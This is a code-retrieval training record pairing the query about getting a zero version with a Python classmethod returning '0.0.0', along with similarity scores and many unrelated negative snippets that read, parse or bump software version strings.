[ "0.7564674", "0.7383004", "0.6840054", "0.6774973", "0.67743796", "0.66971105", "0.6603117", "0.65684706", "0.654473", "0.6492794", "0.6456428", "0.63981634", "0.6362671", "0.63221097", "0.62822104", "0.62783", "0.62724733", "0.62385744", "0.61420053", "0.61398315", "0.6122251", "0.6109359", "0.6092476", "0.6091207", "0.60840106", "0.6053058", "0.60407203", "0.60404986", "0.60355985", "0.60286033", "0.60264456", "0.6023707", "0.60125583", "0.6003506", "0.6001466", "0.59963584", "0.59865355", "0.59641105", "0.59311676", "0.5919194", "0.5911665", "0.5898715", "0.5885181", "0.58795154", "0.58780724", "0.585051", "0.58472747", "0.584105", "0.5836084", "0.5834376", "0.5825048", "0.5819891", "0.5815186", "0.58120847", "0.58059615", "0.57925117", "0.5781256", "0.5771061", "0.57665056", "0.5748979", "0.57456464", "0.57408726", "0.57387036", "0.5736932", "0.57262987", "0.57232755", "0.57198113", "0.571755", "0.57150507", "0.5713469", "0.5713469", "0.5713469", "0.570919", "0.5708002", "0.570072", "0.5699215", "0.5687064", "0.56803334", "0.5678939", "0.5667256", "0.5666295", "0.5657649", "0.56560504", "0.5653198", "0.5651664", "0.5649159", "0.56447375", "0.5644712", "0.5637876", "0.5633691", "0.56270194", "0.56181604", "0.5616766", "0.56065387", "0.55865973", "0.5572534", "0.55686677", "0.5567281", "0.5566963", "0.55661047" ]
0.77435535
0
Get zero version `0.0.0`
def zero(cls: Type[_R]) -> _R:
    return cls("0.0.0")
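A quick call-site sketch; the `Version` class name and its string rendering are assumptions, and any class exposing this classmethod would read the same way:

# Hypothetical Version class exposing the classmethod above.
v = Version.zero()
print(v)  # -> 0.0.0, assuming __str__ renders the release parts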
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_version():\n return \"0.0.1 (prerelease prototype)\"", "def version_number() -> int:\n return 0", "def get_version():\n return '%d.%d.%d' % version_info", "def current_version(self):\n try:\n return self.release_set.order_by('-created')[0].version\n except IndexError:\n return \"0.0.0\"", "def get_version():\n ver = '0.0.0'\n req = restcall(0, 'config', 10.0)\n if req['text'] is not None:\n try: \n tree = ET.fromstring(req['text'])\n ver = tree.findall('app_version')[0].text\n if ver is None:\n ver = '0.0.0'\n _LOGGER.info(\"ISY: firmware version: %s\", ver)\n except ET.ParseError:\n _LOGGER.error(\"No version information found on ISY.\")\n return ver", "def get_version(self):\n return 0", "def _get_version(self):", "def get_version():\n return 1", "def getversion():\r\n\r\n global VERSION\r\n\r\n if len(VERSION) == 3:\r\n return '{}.{}.{}'.format(VERSION[0], VERSION[1], VERSION[2])\r\n else:\r\n return '{}.{}.{}-{}'.format(VERSION[0], VERSION[1], VERSION[2], VERSION[3])", "def test_parse_version(self):\n version = VersionNumberScaleMeasurement.parse_version(None)\n self.assertEqual(Version(\"0\"), version)", "def get_version(self):\n url = '{}/v2/version'.format(self.url)\n try:\n r = requests.get(url)\n if r.status_code == 200:\n return r.json()['version']\n except Exception as e:\n pass\n return ''", "def get_version(self):\n url = '{}/version'.format(self.url)\n try:\n r = requests.get(url)\n if r.status_code == 200:\n return r.json()['version']\n except Exception as e:\n pass\n return ''", "def __getNullVersion(self):\n print(\"Can't get version\")\n return \"unknownVendor\", \"unknownRelease\"", "def get_version():\n\n version_string = version_from_versioneer()\n\n if not version_string:\n version_string = version_from_pip()\n\n return version_string", "def get_version():\n click.echo(get_current_version_number())", "def get_version_number():\n return [0, 1, 0]", "def delete_closing_zero(model_version: str) -> str:\r\n if model_version[-2:] == \".0\":\r\n return model_version[:-2]\r\n return model_version", "def test_get_version(self):\n pass", "def get_version():\n return about.get_version()", "def GetVersion(self):\n return self._SendRequest(HTTP_GET, \"/version\", None, None)", "def get_version(self):\n url = '{}/version'.format(self.url)\n try:\n r = requests.get(url)\n if r.status_code == 200:\n return r.json()['orionld version']\n except Exception as e:\n pass\n return ''", "def default_version_number(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"default_version_number\")", "def version(self) -> str:\n return '0.1'", "def Version(self) -> _n_0_t_12:", "def Version(self) -> _n_0_t_12:", "def get_version(self):\r\n\r\n return self.versions[0].number", "def get_version():\n return '.'.join(map(str, VERSION))", "def do_version(self):\n return \"1.0.0\", True", "def version():\n\n pass", "def getDefaultVersion():\n return _libsbml.FbcExtension_getDefaultVersion()", "def get_version(self):\n return self.http_call(\"get\", url=f\"{self.base_url}/version\").json()", "def test_get_short_version(self):\n pass", "def test_none_version_return(self):\n version_prefix = 'v'\n tags = []\n for i in range(15):\n tags.append(_TagInfo('1.0.' 
+ str(i),\n 'commit' + str(i),\n version_prefix))\n for i in range(15):\n shuffle(tags)\n self.assertEqual(_seek_last_semver_tag(tags, version_prefix), None)", "def get_version():\r\n return __version__", "def version(self):\n _, body = self.request('/', 'GET')\n return body.get('version', None)", "def version_min():\n return VERSION_MIN", "def get_version():\n return __version__", "def get_version():\n return __version__", "def get_version():\n return __version__", "def latest_version(self):\n state = self.coordinator.data\n\n try:\n # fake a new update\n # return \"foobar\"\n return dict_get(state, \"firmware_update_info.base.version\")\n except KeyError:\n return None", "def getDefaultVersion():\n return _libsbml.CompExtension_getDefaultVersion()", "def versionstring():\n return \"%i.%i.%i\" % __version__", "def versionstring():\n return \"%i.%i.%i\" % __version__", "def get_version(self):\n return self.__make_api_call('get/version')", "def get_version(self):\n res = requests.get(self.base_url + '/version')\n\n return res", "def get_default_version(self):\n # latest is a special case where we don't have to check if it exists\n if self.default_version == 'latest':\n return self.default_version\n # check if the default_version exists\n version_qs = self.versions.filter(\n slug=self.default_version,\n active=True\n )\n if version_qs.exists():\n return self.default_version\n return 'latest'", "def get_version(version=None):\n if version is None:\n version = VERSION\n assert len(version) == 5\n assert version[3] in (\"alpha\", \"beta\", \"rc\", \"final\")\n\n parts = 2 if version[2] == 0 else 3\n main = \".\".join(str(digit) for digit in version[:parts])\n\n sub = \"\"\n if version[3] != \"final\":\n mapping = {\"alpha\": \"a\", \"beta\": \"b\", \"rc\": \"rc\"}\n sub = mapping[version[3]] + str(version[4])\n\n return main + sub", "def strip_leading_zeros(version: str) -> str:\n return \".\".join(str(int(i)) for i in version.split(\".\"))", "def get_version(self):\n pass", "def test__get_component_version_empty(self):\n self._ucr({'repository/online/component/a/version': ''})\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR, MAJOR, MINOR, PATCH): '',\n })\n ver = U.UCS_Version((MAJOR, MINOR, 0)) # comonent.erratalevel!\n comp_ver = self.u._get_component_versions('a', start=ver, end=ver)\n self.assertEqual(set((ver,)), comp_ver)", "def version(self):\n\n if self.running() is True:\n return APIConsumer.get(\"/version\").content\n else:\n return None", "def test_version_0(self):\r\n self.assertEqual(0, self._version_test(self.version0_nodrafts))", "def version(self) -> 'outputs.VersionResponse':\n return pulumi.get(self, \"version\")", "def test_get_version():\n result = uflash.get_version()\n assert result == '.'.join([str(i) for i in uflash._VERSION])", "def test_above_24_latest_version(self):\n self.data['version'] = ''\n self.data['appVersion'] = '28.0'\n\n up = self.get(self.data)\n rdf = up.get_rdf()\n assert rdf.find('20202020.01') > -1", "def getDefaultVersion():\n return _libsbml.SBMLDocument_getDefaultVersion()", "def version_get():\n try:\n return json_response.success({'version': version.local_version()})\n except version.Error as e:\n return json_response.error(str(e)), 200", "def get_version():\n\n with open('__init__.py') as f:\n for line in f.readlines():\n if '__version__' in line:\n apicem_version = line.strip().split(\"=\")[-1].strip(\" '\")\n if '__first_release_date__' in line:\n first_release_data_str = line.strip().split(\"=\")[-1].strip(\" '\")\n 
first_release_data = date(*[int(num) for num in first_release_data_str.split('.')])\n num_commits = get_cr_num(first_release_data)\n return '{apicem_version}.{num_commits}'.format(\n apicem_version=apicem_version, num_commits=num_commits)\n\n raise ValueError(\"could not read version\")", "def version():\n return uname().version", "def version():\n return uname().version", "def query_version(self):\n return self.connection.cursor().execute('SELECT version()').fetchone()[0]", "def Hello(self):\n version = '1.5.3'\n print 'returned version number', version\n return version", "def version_from_versioneer():\n\n # Attempt to get the version string from the git repository\n try:\n from .versioneer_version import get_versions # pylint: disable=import-outside-toplevel\n version_info = get_versions()\n if version_info['error'] is None:\n return version_info['version']\n return None\n except: # pylint: disable=bare-except\n return None", "def getversion(online: bool = True) -> str:\n branches = {\n 'master': 'branches/master',\n 'stable': 'branches/stable',\n }\n data = getversiondict()\n data['cmp_ver'] = 'n/a'\n local_hsh = data.get('hsh', '')\n hsh = {}\n\n if online:\n if not local_hsh:\n data['cmp_ver'] = 'UNKNOWN'\n else:\n for branch, path in branches.items():\n with suppress(Exception):\n hsh[getversion_onlinerepo(path)] = branch\n if hsh:\n data['cmp_ver'] = hsh.get(local_hsh, 'OUTDATED')\n\n data['hsh'] = local_hsh[:7] # make short hash from full hash\n return '{tag} ({hsh}, {rev}, {date}, {cmp_ver})'.format_map(data)", "def testStratisVersion(self):\n version = Manager.Properties.Version.Get(get_object(TOP_OBJECT))\n (major, _, _) = version.split(\".\")\n self.assertEqual(major, \"0\")", "def _get_version(self):\n if _cbc_version is None:\n return _extract_version('')\n return _cbc_version", "def version():\n\n version = None\n output = gitopen(['--version'])\n m = re.search(br\" version ([\\d\\.A-Za-z]+)\", output)\n if m is not None:\n version = m.group(1).decode('utf-8')\n return version", "def version(self):", "def get_version():\n\n with open('yubico/yubico_version.py', 'r') as f:\n match = VERSION_PATTERN.search(f.read())\n return match.group(1)", "def test_version_missing(self):\r\n self.assertIsNone(self._version_test(self.no_version))", "def get_self_version(dist_name):\n try:\n return get_distribution(dist_name).version\n except DistributionNotFound:\n return 'version not found'", "def getVersion():\n try:\n fh=open(version_py, 'r')\n version=fh.read().strip().split('=')[-1].replace(\"'\",'').lstrip()\n fh.close()\n except:\n return None\n\n return version", "def build_version(self):\n return self.nodes[0].get('infos').get('system_info').get('system_version')", "def get_version() -> str:\n return __version__", "def get_latest_version(model: str) -> str:\n if model in {\"small\", \"medium\", \"large\"}:\n model = f\"da_dacy_{model}_trf\"\n versions = [mdl.split(\"-\")[-1] for mdl in models_url if mdl.startswith(model)]\n versions = sorted(\n versions,\n key=lambda s: [int(u) for u in s.split(\".\")],\n reverse=True,\n )\n return versions[0]", "def get_base_version():\n if BASE_VERSION is None:\n return shell_output('git describe --tags --abbrev=0')\n return BASE_VERSION", "def getDefaultVersion():\n return _libsbml.MultiExtension_getDefaultVersion()", "def version():\n version_info = pbr.version.VersionInfo('ardana-service')\n return version_info.version_string_with_vcs()", "def get_version(cls) -> str:\n if not cls.is_available():\n return 'None'\n else:\n import 
pkg_resources\n try:\n return pkg_resources.get_distribution('ncnn').version\n except Exception:\n return 'None'", "def version():\n return __VERSION__", "def test_request_estable_version(self):\n current_stable_version = get_stable_version()\n self.assertIsNotNone(current_stable_version)", "def get_version():\n return \".\".join([str(i) for i in config[\"version\"]])", "def get_version():\r\n return '.'.join((str(each) for each in VERSION[:3]))", "def print_version():\n print(\"1.0\")", "def get_server_version():\n url_address = 'https://raw.githubusercontent.com/muhammadfredo/FrMaya/master/FrMaya/version.py'\n url_data = urllib2.urlopen(url_address).read(200)\n result = re.search(r'(\\d+), (\\d+), (\\d+)', url_data, re.MULTILINE)\n if result:\n version_list = [int(v) for v in result.groups()]\n return version_list\n else:\n raise ValueError('Cannot get server version!!!')", "def get_latest_version():\n found_version = \"unknown\"\n version_re = r\"^## \\[(\\d+\\.\\d+\\.\\d+)\\]\"\n\n with open(os.path.join(__repo_root__, \"CHANGELOG.md\")) as changelog_file:\n for line in changelog_file:\n found = re.search(version_re, line)\n if found:\n found_version = found.group(1)\n break\n\n return found_version", "def get_min_build_version(version: str) -> str:\n return Version(version).replace(micro=0).get_stable().dumps()", "def get_version():\n return magpy.get_version()", "def get_version():\n path = CWD / \"pettingzoo\" / \"__init__.py\"\n content = path.read_text()\n\n for line in content.splitlines():\n if line.startswith(\"__version__\"):\n return line.strip().split()[-1].strip().strip('\"')\n raise RuntimeError(\"bad version data in __init__.py\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def dump_version(input_bytes):\n return dump_from_release(input_bytes, \"version\")", "def version_number(path: str) -> str:\n exp = r'__version__[ ]*=[ ]*[\"|\\']([\\d]+\\.[\\d]+\\.[\\d]+[\\.dev[\\d]*]?)[\"|\\']'\n version_re = re.compile(exp)\n\n with open(path, 'r') as fqe_version:\n version = version_re.search(fqe_version.read()).group(1)\n\n return version", "def src_get_version():\n return ffi.string(_lib.src_get_version()).decode()", "def test_npm_latest_version_request(_foo):\n version = NPMMonitor.fetch_latest_package_version('foobar')\n assert version == '1.3.5'\n assert NPMMonitor.fetch_latest_package_version('foobar') is None\n assert NPMMonitor.fetch_latest_package_version('foobar') is None", "def get_version():\n\n with open('u2fval/__init__.py', 'r') as f:\n match = VERSION_PATTERN.search(f.read())\n return match.group(1)", "def test_undefined_semver(self):\n v1 = versions.Version(version='1.2.3', name='foo')\n expected = None\n\n self.assertEqual(v1.build, expected)" ]
[ "0.7245187", "0.668971", "0.66882396", "0.6665648", "0.6570469", "0.64901686", "0.64345765", "0.64268774", "0.63672644", "0.6360634", "0.63367814", "0.6328667", "0.6325577", "0.63126534", "0.6253386", "0.6247568", "0.62471354", "0.6241517", "0.6227065", "0.6226674", "0.6218984", "0.6200833", "0.61821896", "0.617639", "0.617639", "0.61438334", "0.61386836", "0.61378485", "0.61342424", "0.6113383", "0.6110186", "0.61097014", "0.6106239", "0.60923064", "0.6071033", "0.60624963", "0.6062326", "0.6062326", "0.6062326", "0.6044074", "0.604395", "0.60416824", "0.60416824", "0.60087603", "0.60063046", "0.6000759", "0.59927285", "0.59918916", "0.59911203", "0.5984771", "0.59792644", "0.59719807", "0.5960774", "0.59596086", "0.59578574", "0.59572417", "0.5952879", "0.59457225", "0.5941938", "0.5941938", "0.5938286", "0.5937441", "0.59345543", "0.59317154", "0.5921998", "0.5919399", "0.59184206", "0.591722", "0.5915258", "0.59123796", "0.59042484", "0.59028536", "0.5895182", "0.58951193", "0.5888707", "0.58870566", "0.58806163", "0.5879938", "0.58751976", "0.5871814", "0.5869985", "0.58697766", "0.5856508", "0.58334434", "0.58215827", "0.58200467", "0.5815895", "0.5815701", "0.5815175", "0.581312", "0.581312", "0.581312", "0.581312", "0.581312", "0.58038414", "0.5800681", "0.57990503", "0.5792473", "0.5791157", "0.5784804" ]
0.68623227
1
Create a copy of a current version instance.
def copy(self: _R) -> _R:
    return self.__class__(self.dumps())
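A short sketch of what this round-trip buys, assuming `dumps()` returns the canonical version string and equality is value-based (both assumptions about the surrounding class):

# Hypothetical usage: the clone is equal in value but a distinct object.
original = Version("1.2.3")
clone = original.copy()
assert clone == original      # value-based __eq__ assumed
assert clone is not original  # independent instance, safe to mutate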
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def version_clone(self, version_id):\n raise Exception(\"TODO\")", "def __copy__(self):\n return self.__class__(self.baseurl, self.template, self.selection[:],\n self.slice[:], self.application)", "def make_reversion_to_copy(self, copy):\n if copy.copy_of != self._id:\n raise VersioningError(\"%s is not a copy of %s\" % (copy, self))\n app = deepcopy(copy.to_json())\n app['_rev'] = self._rev\n app['_id'] = self._id\n app['version'] = self.version\n app['copy_of'] = None\n app.pop('_attachments', None)\n app.pop('external_blobs', None)\n cls = self.__class__\n app = cls.wrap(app)\n app.copy_attachments(copy)\n\n for form in app.get_forms():\n # reset the form's validation cache, since the form content is\n # likely to have changed in the revert!\n form.clear_validation_cache()\n form.version = None\n\n app.build_broken = False\n\n return app", "def copy(self):\n cls = self.__class__\n result = cls.__new__(cls)\n result.__dict__.update(self.__dict__)\n return result", "def copy (self):\n return self.__class__(self.name, self[:])", "def _new_instance(self):\n return self.__class__(self._vmodule)", "def copy(self):\n return object.__new__(type(self))", "def clone(self):\n return _libsbml.SBMLLevelVersionConverter_clone(self)", "def copy(self):\n cls = type(self)\n new = cls()\n new.default = deepcopy(self.default)\n new.current = deepcopy(self.current)\n new.stepnames = deepcopy(self.stepnames)\n return new", "def copy(self):\n return self.__class__(self)", "def copy(self):\n return self.__class__(self)", "def copy(self):\n return self.__class__(**vars(self))", "def copy(self):\n return self.__class__(dict(self))", "def copy(self):\n out = type(self).__new__(self.__class__)\n out.__dict__.update(self.__dict__)\n # make sure the copy has its own unique random number generator\n seed_seq = self.rng._bit_generator._seed_seq.spawn(1)[0]\n out.__dict__['rng'] = get_generator(seed_seq)\n return out", "def clone(self):\n return self.__class__(self.name, *self)", "def copy(self):\n return self.__class__(\n self.kind, self.link_ids.copy(), self.included_nodes.copy(), self.mass,\n self.name, self.crossring_cleavages.copy(), self.composition.copy())", "def copy(self):\n return self.from_builder(self)", "def copy(self):\n o = self.__class__(self.project, self.name)\n Scriptable.copy(self, o)\n o.position = tuple(self.position)\n o.direction = self.direction\n o.rotation_style = self.rotation_style\n o.size = self.size\n o.is_draggable = self.is_draggable\n o.is_visible = self.is_visible\n return o", "def copy(self):\n new = object.__new__(type(self))\n new.bot = self.bot\n new.description = self.description\n new.icon_hash = self.icon_hash\n new.icon_type = self.icon_type\n new.id = 0\n new.name = self.name\n return new", "def copy(self):\n return self.__class__(self.value, self.is_cloud)", "def copy(self):\n\t\ttemp = self.__class__()\n\t\ttemp.copy_from(self)\n\t\treturn temp", "def clone(self):\n return self.__class__(self, self.spectrum, wallet=self.wallet)", "def __copy__(self):\n cls = self.__class__\n result = cls.__new__(cls)\n to_copy = {\"_cache\", \"_buffers\", \"_parameters\", \"_modules\"}\n result.__dict__.update(\n {k: v.copy() if k in to_copy else v for k, v in self.__dict__.items()}\n )\n return result", "def clone(self):", "def copy(self):\n import copy as pcopy\n return pcopy.deepcopy(self)", "def clone_shallow(self, forced_version_date=None):\n if not self.pk:\n raise ValueError('Instance must be saved before it can be cloned')\n\n if self.version_end_date:\n raise ValueError('This 
is a historical item and can not be cloned.')\n\n if forced_version_date:\n if not self.version_start_date <= forced_version_date <= get_utc_now():\n raise ValueError('The clone date must be between the version start date and now.')\n else:\n forced_version_date = get_utc_now()\n\n earlier_version = self\n\n later_version = copy.copy(earlier_version)\n later_version.version_end_date = None\n later_version.version_start_date = forced_version_date\n\n # set earlier_version's ID to a new UUID so the clone (later_version) can\n # get the old one -- this allows 'head' to always have the original\n # id allowing us to get at all historic foreign key relationships\n earlier_version.id = six.u(str(uuid.uuid4()))\n earlier_version.version_end_date = forced_version_date\n earlier_version.save()\n\n for field in earlier_version._meta.many_to_many:\n earlier_version.clone_relations_shallow(later_version, field.attname, forced_version_date)\n\n if hasattr(earlier_version._meta, 'many_to_many_related'):\n for rel in earlier_version._meta.many_to_many_related:\n earlier_version.clone_relations_shallow(later_version, rel.via_field_name, forced_version_date)\n\n later_version.save()\n\n return later_version", "def __copy__(self, *args, **kwargs):\n return self.copy()", "def copy (self):\n import copy\n return copy.copy(self)", "def copy(self):\n new = self\n return new", "def copy(self):\n cls = type(self)\n # Create a new instance without calling __init__: parameters are\n # different depending on the class.\n new_box = cls.__new__(cls)\n # Copy attributes\n new_box.__dict__.update(self.__dict__)\n return new_box", "def copy(self):\n new_client = self._client.copy()\n return self.__class__(self.instance_id, new_client,\n self._cluster_location_id,\n display_name=self.display_name)", "def copy(self):\n new = object.__new__(type(self))\n new.approximate_online_count = self.approximate_online_count\n new.approximate_user_count = self.approximate_user_count\n new.description = self.description\n new.discovery_splash_hash = self.discovery_splash_hash\n new.discovery_splash_type = self.discovery_splash_type\n new.emojis = self.emojis.copy()\n features = self.features\n if (features is not None):\n features = (*features,)\n new.features = features\n new.icon_hash = self.icon_hash\n new.icon_type = self.icon_type\n new.id = self.id\n new.invite_splash_hash = self.invite_splash_hash\n new.invite_splash_type = self.invite_splash_type\n new.stickers = self.stickers.copy()\n new.name = self.name\n return new", "def copy(self):\n return self.__class__(self.name, list(self.gRNAs))", "def copy(self):", "def __copy__(self):\n trait_data = self.__getstate__()\n inst = self.__class__.create(trait_data)\n return inst", "def make_instance(self, include_optional):\n # model = synclient.models.version_info.VersionInfo() # noqa: E501\n if include_optional :\n return VersionInfo(\n content_md5 = '0', \n content_size = '0', \n id = '0', \n modified_by = '0', \n modified_by_principal_id = '0', \n modified_on = '0', \n version_comment = '0', \n version_label = '0', \n version_number = 56\n )\n else :\n return VersionInfo(\n )", "def copy(self):\n cp = self.__class__() # create a new instance of the subclass\n # copy current state to the new instance\n cp._acc = self._acc\n cp._seed = self._seed\n cp._secret = self._secret\n cp._last_stripe = self._last_stripe\n cp._total_length = self._total_length\n cp._buffer = self._buffer\n return cp", "def copy(self):\n def init(self, **kwargs):\n \"\"\"Initialization.\"\"\"\n for k, v in 
kwargs.items():\n setattr(self, k, v)\n\n return type(type(self).__name__, (type(self),), {\"__init__\": init})(**self.__dict__)", "def clone(self):\n\n copy = self.__class__(self.name, self.data)\n\n copy.set_fixed_variables_from_pdf(self)\n \n return copy", "def copy(self):\n\t\treturn pythoncopy.deepcopy(self)", "def copy(self):\n new_model = Model(\n name=self.name,\n functions=copy.deepcopy(self.functions),\n domain=self.domain.copy(),\n density=self.density.copy(),\n )\n new_model.update()\n\n return new_model", "def copy(self): # real signature unknown; restored from __doc__\n pass", "def copy(self): # real signature unknown; restored from __doc__\n pass", "def copy(self): # real signature unknown; restored from __doc__\n pass", "def copy (self):\n copy = NFFG(id=self.id, name=self.name, version=self.version,\n mode=self.mode, metadata=self.metadata.copy(),\n status=self.status)\n copy.network = self.network.copy()\n return copy", "def clone(self):\r\n #return copy(self)\r\n cp = self.__class__(self.type, None, None, self.name)\r\n cp.tag = copy(self.tag)\r\n return cp", "def copy(self):\n pass", "def copy(self):\n pass", "def copy(self):\n pass", "def copy(self):\n try:\n return self.__class__(self, copy=True)\n except TypeError:\n new = self.__class__(copy.deepcopy(self))\n return new", "def clone(self):\n return self", "def copy(self):\n return self.mutate().simple_copy()", "def __copy__(self):\n return self.copy()", "def copy(self):\n return self.__class__(self.items, self.is_cloud)", "def clone(self):\n raise NotImplementedError", "def export_as(self, version):\n # its a new version please update the paths\n version.update_paths()\n # set the extension to '.comp'\n version.extension = self.extensions[0]\n version.created_with = self.name\n\n raise NotImplementedError(\n 'export_as() is not implemented yet for Fusion'\n )\n\n # create a local copy\n self.create_local_copy(version)", "def copy(self):\r\n return copy.copy(self)", "def clone(self):\r\n cp = self.__class__(self.type, self.data, self.name)\r\n cp.tag = copy(self.tag)\r\n return cp", "def copy(self):\n dnew = Date(self.month, self.day, self.year)\n return dnew", "def copy(self):\n new = object.__new__(type(self))\n new.required = self.required\n new.title = self.title\n new.type = self.type\n values = self.values\n if (values is not None):\n values = (*values,)\n new.values = values\n return new", "def copy(self):\n return self.from_string(self.format(), self.filename, ignore_checksum=True)", "def copy(self):\n from copy import deepcopy\n return deepcopy(self)", "def copy(self):\n return copy.copy(self)", "def copy(self):\n return copy.copy(self)", "def copy(self):\n return copy.copy(self)", "def clone(self) -> Self:\n return clone(self, safe=True)", "def clone(self):\n return self.copy()", "def copy(self):\n return vertex(self.x, self.y, self.z)", "def copy(self):\n if self.__root__ is self:\n return plist(self)\n return plist(self, root=self.__root__.copy())", "def copy(self):\n return copy(self)", "def copy(self):\n return copy(self)", "def copy(self):\n new = self.__class__()\n new.values = self.values.copy()\n return new", "def copy(self):\n return Object(_default_item=self._default_item, **self._items)", "def copy(self):\n return super().copy()", "def copy_with(self):\n return self.copy()", "def _copy_(self):\n return copy.copy(self)", "def clone(self):\n return _libsbml.ModelCreator_clone(self)", "def copy(self):\n return Struct(self)", "def clone(self):\n from copy import deepcopy\n return deepcopy(self)", 
"def copy(self):\n return self.__copy__()", "def copy(self):\n return self.__copy__()", "def copy(self):\n return self.__copy__()", "def copy(self):\n return self.__copy__()", "def clone(self):\n # make copies of my state\n beta = self.beta\n theta = self.theta.clone()\n sigma = self.sigma.clone()\n likelihoods = self.prior.clone(), self.data.clone(), self.posterior.clone()\n\n # make one and return it\n return type(self)(beta=beta, theta=theta, likelihoods=likelihoods, sigma=sigma)", "def _new_instance(self):\n return self.__class__(self._vmodule, self._tensor_rank)", "def clone(self):\n return shallow_clone(self)", "def copy(self):\n new_date = Date(self.month, self.day, self.year)\n return new_date", "def copy(self):\n new = self.__class__(integration=None, data=None)\n for attribute, value in self.__dict__.items():\n if attribute in self.referenced_attributes:\n setattr(new, attribute, value)\n elif hasattr(value, 'copy'):\n setattr(new, attribute, value.copy())\n else:\n setattr(new, attribute, deepcopy(value))\n return new", "def copy(self):\n o = self.__class__(self.target,\n self.block.copy(),\n self.style,\n self.is_visible,\n self.pos)\n o.slider_min = self.slider_min\n o.slider_max = self.slider_max\n return o", "def copy(self) -> 'BaseImage':\n image = BaseImage(\n image_path=self._filepath,\n drawing_mode=self._drawing_mode,\n drawing_offset=self._drawing_offset,\n load_from_file=False,\n frombase64=self._frombase64\n )\n image._angle = self._angle\n image._surface = self._surface.copy()\n image._original_surface = self._surface.copy()\n image.smooth_scaling = self.smooth_scaling\n if self._attributes is not None:\n for k in self._attributes.keys():\n image.set_attribute(k, self._attributes[k])\n return image", "def copy(self):\n p = Project()\n p.name = self.name\n p.path = self.path\n p._plugin = self._plugin\n p.stage = self.stage.copy()\n p.stage.project = p\n\n for sprite in self.sprites:\n s = sprite.copy()\n s.project = p\n p.sprites.append(s)\n\n for actor in self.actors:\n if isinstance(actor, Sprite):\n p.actors.append(p.get_sprite(actor.name))\n else:\n a = actor.copy()\n if isinstance(a, Watcher):\n if isinstance(a.target, Project):\n a.target = p\n elif isinstance(a.target, Stage):\n a.target = p.stage\n else:\n a.target = p.get_sprite(a.target.name)\n p.actors.append(a)\n\n p.variables = dict((n, v.copy()) for (n, v) in self.variables.items())\n p.lists = dict((n, l.copy()) for (n, l) in self.lists.items())\n p.thumbnail = self.thumbnail\n p.tempo = self.tempo\n p.notes = self.notes\n p.author = self.author\n return p", "def copy(self):\n\t\tassert ltrace_func(TRACE_BASE)\n\t\ttemp = self.__class__()\n\t\ttemp.copy_from(self)\n\t\treturn temp", "def __copy__(self,iClass=None):\n iClass = iClass or self.__class__\n clone = iClass(GPath(self.archive))\n copier = copy.copy\n getter = object.__getattribute__\n setter = object.__setattr__\n for attr in Installer.__slots__:\n setter(clone,attr,copier(getter(self,attr)))\n return clone", "def copy(self) -> ItemVariant:\n return ItemVariant(\n self.pak_id,\n self.editor,\n self.vbsp_config,\n self.editor_extra.copy(),\n self.authors.copy(),\n self.tags.copy(),\n self.desc,\n self.icons.copy(),\n self.ent_count,\n self.url,\n self.all_name,\n self.all_icon,\n self.source,\n )", "def copy(self):\n new_game = Game(self.name, *self.agents, independent_update=self.independent_update, default_run_kwargs=self.default_run_kwargs, _set_defaults=False)\n new_game.i = self.i\n new_game.env = self.env_copy()\n new_game.env[\"game\"] 
= new_game\n return new_game", "def copy(self):\n node_new = Node(self.state.copy(), self.parent, self.children.copy(), self.RRT, self.path_length)\n node_new.vs = self.vs.copy()\n node_new.RRT = self.RRT\n node_new.observed = self.observed\n node_new.observation_node = self.observation_node\n node_new.observation_area = self.observation_area\n\n return node_new", "def copy(self):\n state = State(self.state_object, self.compute_dag)\n state.stage_id_map = self.stage_id_map.copy()\n return state", "def clone(self):\n return _libsbml.SBase_clone(self)", "def copy(self):\r\n return copy.deepcopy(self)", "def copy(self: _R) -> _R:\n return self.__class__(\n self.name,\n list(self.children),\n docstring=self.docstring,\n stringify=self.is_stringified(),\n replace_with_dict=self.replace_with_dict,\n )" ]
[ "0.69766486", "0.68571734", "0.6853616", "0.6696837", "0.66747206", "0.6633099", "0.6621376", "0.6601393", "0.65898925", "0.65894204", "0.65894204", "0.6584453", "0.65257055", "0.6520473", "0.6510755", "0.6490696", "0.6472705", "0.6456239", "0.6437196", "0.6430004", "0.64159894", "0.64020145", "0.63995486", "0.6398769", "0.6379477", "0.6373328", "0.6372899", "0.63652354", "0.6357272", "0.63355994", "0.63261974", "0.63116693", "0.6300793", "0.6287087", "0.627001", "0.62437487", "0.6240778", "0.6238915", "0.6224349", "0.6223374", "0.6221226", "0.62078524", "0.62078524", "0.62078524", "0.62076294", "0.62056774", "0.6198215", "0.6198215", "0.6198215", "0.6191457", "0.6179976", "0.6177097", "0.6176996", "0.6167757", "0.6145398", "0.611663", "0.6099046", "0.6095142", "0.607062", "0.6066057", "0.6058061", "0.6056581", "0.6052864", "0.6052864", "0.6052864", "0.60495865", "0.6047195", "0.6042214", "0.60373", "0.6034124", "0.6034124", "0.6034055", "0.60327876", "0.6025493", "0.6011092", "0.60008633", "0.59957224", "0.59852237", "0.59816915", "0.59805566", "0.59805566", "0.59805566", "0.59805566", "0.59714997", "0.5955554", "0.5950496", "0.5948289", "0.59465545", "0.5942438", "0.5941593", "0.5938352", "0.59373975", "0.5936615", "0.5935409", "0.59337926", "0.5922805", "0.5918981", "0.5915814", "0.5913418", "0.59121317" ]
0.63095486
32
Get next release version.
def bump_release( self: _R, release_type: Literal["major", "minor", "micro"] = VersionParts.MICRO, inc: int = 1, ) -> _R: if release_type == VersionParts.MAJOR: return self.bump_major(inc) if release_type == VersionParts.MINOR: return self.bump_minor(inc) return self.bump_micro(inc)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
